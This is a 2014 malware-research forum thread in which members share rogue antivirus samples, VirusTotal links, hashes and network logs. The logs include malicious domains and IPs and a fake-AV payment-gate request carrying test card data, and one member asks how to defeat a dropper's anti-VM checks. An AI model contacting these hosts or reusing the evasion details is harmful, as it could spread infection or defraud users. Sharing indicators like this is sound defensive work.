Page 1 of 6
Rogue Antimalware (FakeAV, 2014 year)
PostPosted:Wed Jan 01, 2014 6:08 pm
by Xylitol
remark start
2010 year FakeAV
2011 year FakeAV
2012 year FakeAV
2013 year FakeAV
remark end
Windows Accelerator Pro
https://www.virustotal.com/en/file/6946 ... 388598425/ > 6/46
http://web-sniffer.net/index.php?url=ht ... =GET&uak=0
Network activities:
Code: Select allhttp://zocrxiyds.freetzi.com/1.php
• dns: 1 ›› ip: 69.162.82.253 - adresse: ZOCRXIYDS.FREETZI.COM
http://c3913c6c.webantiviruslk.pl/index.html
• dns: 1 ›› ip: 109.236.86.172 - adresse: C3913C6C.WEBANTIVIRUSLK.PL
---
http://93.115.82.248/?0=1&1=1&2=9&3=i&4=2600&5=1&6=1111&7=obqrhutjgv
http://93.115.82.248/?0=1&1=1&2=9&3=p&4=2600&5=1&6=1111&7=obqrhutjgv
http://94.185.80.155/customgate2/?callback=jQuery17203112214965869417_1388599195453&name=Xylibox+Labs&email=xylitol%40malwareint.com&num=4111111111111111&cvv=147&year=2017&month=05&phone=3-478-856-54-05&address=123+winlocker+street&country=FRA&state=XX&zip=75000&option=0&support=false&id=1&sub_id=1&install_id=obqrhutjgv&project_id=9&serial=EWBWF-QYHBS-XGTGK-EH0A&_=1388599353015
http://94.185.80.155/customgate2/process/?callback=jQuery17203112214965869417_1388599195454&transaction_id=646959059412b4308a4c613844951708&_=1388599356453
http://94.185.80.155/customgate2/process/?callback=jQuery17203112214965869417_1388599195455&transaction_id=646959059412b4308a4c613844951708&_=1388599359469
http://94.185.80.155/customgate2/process/?callback=jQuery17203112214965869417_1388599195456&transaction_id=646959059412b4308a4c613844951708&_=1388599362469
http://94.185.80.155/customgate2/process/?callback=jQuery17203112214965869417_1388599195457&transaction_id=646959059412b4308a4c613844951708&_=1388599365469
http://94.185.80.155/customgate2/process/?callback=jQuery17203112214965869417_1388599195458&transaction_id=646959059412b4308a4c613844951708&_=1388599368469
http://93.115.82.248/?0=1&1=1&2=9&3=p&4=2600&5=1&6=1111&7=obqrhutjgv
--
Code: Select allfakeav://payandsec.com/p/?group=sgp&nid=9A93E62D&affid=85700&lid=0040&ver=0040 https://www.virustotal.com/en/ip-address/178.162.199.33/information/
fakeav://sgpsupport.com/
https://www.virustotal.com/en/ip-addres ... formation/
https://www.virustotal.com/en/ip-addres ... formation/
Re: Rogue Antimalware (FakeAV, 2014 year)
PostPosted:Wed Jan 01, 2014 7:17 pm
by Win32:Virut
BitNefender Fake AV
PostPosted:Wed Jan 01, 2014 11:13 pm
by dairu87
Ran across a reallllly nasty Fake AV today... Came with some sort of bootkit... another tech had already removed the rootkit so I cannot identify that... but this Fake AV doesnt seem to be pulling up anything to interfere with peoples machines... It looks like it is just running in the background... It dumps a bunch of randomly named folders to %appdata% and fills them with randomly named .exe's to invoke its primary process and max out the CPU & memory. It doesnt seem to have a limit to how many of those directories it makes either... Were about 40 different directories all filled with malicious .exe's. It also dumps around 10-12 randomly named .exe's into the syswow64 directory. I was unable to obtain any samples of a dropper unfortunately (Sorry) But was wondering... has any one else seen this nasty thing?
Re: BitNefender Fake AV
PostPosted:Fri Jan 03, 2014 10:21 pm
by patriq
dairu87 wrote:Ran across a reallllly nasty Fake AV today... I was unable to obtain any samples of a dropper unfortunately (Sorry) But was wondering... has any one else seen this nasty thing?
no sample or hash of the file?
don't think you will find much without those details.. good luck anyways.
Re: Rogue Antimalware (FakeAV, 2014 year)
PostPosted:Sat Jan 04, 2014 1:19 am
by malwareMD
thanks for sharing, we have also seen similar variants in past week.
Re: Rogue Antimalware (FakeAV, 2014 year)
PostPosted:Sat Jan 04, 2014 4:19 pm
by Cody Johnston
malwareMD wrote:thanks for sharing, we have also seen similar variants in past week.
dairu87 wrote:It dumps a bunch of randomly named folders to %appdata% and fills them with randomly named .exe's to invoke its primary process and max out the CPU & memory.
dairu87 wrote:It also dumps around 10-12 randomly named .exe's into the syswow64 directory.
Please share what you find if you come across this again. A sample of each exe from %appdata% and syswow64/system32 will work. A screenshot and VirusTotal scan would be very helpful for us as well. Use the first 2 posts in this topic as an example. Many times with rogues the exe that runs the UI acts also as a dropper, so you may in fact have found a dropper already. Thanks! :)
Re: BitNefender Fake AV
PostPosted:Wed Jan 08, 2014 12:25 am
by Cody Johnston
dairu87 wrote:Ran across a reallllly nasty Fake AV today... Came with some sort of bootkit... another tech had already removed the rootkit so I cannot identify that... but this Fake AV doesnt seem to be pulling up anything to interfere with peoples machines... It looks like it is just running in the background... It dumps a bunch of randomly named folders to %appdata% and fills them with randomly named .exe's to invoke its primary process and max out the CPU & memory. It doesnt seem to have a limit to how many of those directories it makes either... Were about 40 different directories all filled with malicious .exe's. It also dumps around 10-12 randomly named .exe's into the syswow64 directory. I was unable to obtain any samples of a dropper unfortunately (Sorry) But was wondering... has any one else seen this nasty thing?
Attached the dropper, it was in %localappdata% in random named folder. Looks like Cidox.B was the bootkit on this one.
Publisher BitMefender S.R.L.
MD5 204806d51d301a99be49b8882a791cfc
https://www.virustotal.com/en/file/10cc ... 389139839/
Re: Rogue Antimalware (FakeAV, 2014 year)
PostPosted:Wed Jan 08, 2014 3:00 pm
by bitstechs
Hmm, must have good anti-vm on that dropper Cody. I've got my virtual box patched for anti-vm and the virus doesn't want to infect it, any thoughts or work arounds?
Re: Rogue Antimalware (FakeAV, 2014 year)
PostPosted:Fri Jan 10, 2014 3:35 pm
by Win32:Virut
Re: Rogue Antimalware (FakeAV, 2014 year)
PostPosted:Sun Jan 12, 2014 12:05 pm
by hx1997
Smart Guard Protection - Malware Security Suite
VT low detection 3 / 45
https://www.virustotal.com/en/file/2304 ... 389528458/
捕获3.png (330.54 KiB) Viewed 2179 times
